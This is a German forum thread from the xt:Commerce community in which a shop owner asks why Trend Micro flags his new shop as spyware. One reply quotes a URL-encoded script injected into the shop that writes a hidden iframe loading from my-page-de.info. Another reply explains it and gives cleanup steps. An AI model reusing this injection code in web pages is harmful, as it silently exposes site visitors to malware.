Jump to content
xt:Commerce Community Forum

trendmicro sicherheitswarnung my-page-de.info

sky_shop

By sky_shop,
in Installation und Konfiguration

Recommended Posts

sky_shop Newbie

sky_shop

Posted
Posted

Hallo,

wenn ein User mit dem aktuellen Trendmicro auf meinen neuen Shop

** url entfernt *** geht, erhält er die Warnungmeldung das hier

versucht wird Spyware auf seinen rechner zu laden. Und Sie empfehlen

die Webseite nicht zu öffnen. Wer hat das selbige Problem? Wer kann helfen?

Grafiken im Anhang

Besten Dank im Voraus.

gruß

Sascha

post-76725-14337914614001_thumb.jpg

post-76725-1433791461415_thumb.jpg

Link to comment
Share on other sites
mzanier Newbie

mzanier

Posted
Posted

da hat wohl jemand deinen webspace gehackt, denn anscheinend wurde hier einie datei des shops modifiziert und das eingefügt:

<Script>

......"%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%7b%20%76%61%72%20%69%20%3d%20%30%3b%77%68%69%6c%65%28%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%2e%6c%65%6e%67%74%68%29%7b%76%61%72%20%65%6c%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%5b%69%5d%3b%69%66%28%20%28%65%6c%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%2e%77%69%64%74%68%3c%35%20&&%20%65%6c%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%2e%6e%61%6d%65%21%3d%27%63%34%27%20%29%20%7b%65%6c%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%29%3b%7d%20%65%6c%73%65%20%69%2b%2b%3b%7d%7d%63%68%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%3b%0d%0a%69%66%20%28%21%6d%79%69%61%29%20%7b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%34%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%39&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%31%39%38%34%29%2b%27%32%30%61%64%37%33%35%64%32%32%32%5c%27%20%77%69%64%74%68%3d%34%38%20%68%65%69%67%68%74%3d%34%35%38%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b......

</Script>

was vermutlich ein iframe sein wird welches eine infizierte datei lädt.

Link to comment
Share on other sites
hubbabubba Newbie

hubbabubba

Posted
Posted

Recht hat er. Ist'n kleines Javascript welches ein unsichtbares iframe von der, in der Warnmeldung, angegebenen Adresse nachlädt.

Ich würd' kein Risiko eingehen was in deinem Shop noch so alles manipuliert ist. Passworte ändern, Hoster informieren. Manipulierte Shopdateien+Datenbank runterkopieren und sichern (man weiß ja nie ob mans noch braucht) und vollständig neu aufspielen.

mfg

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

Go to topic listing
×
×
  • Create New...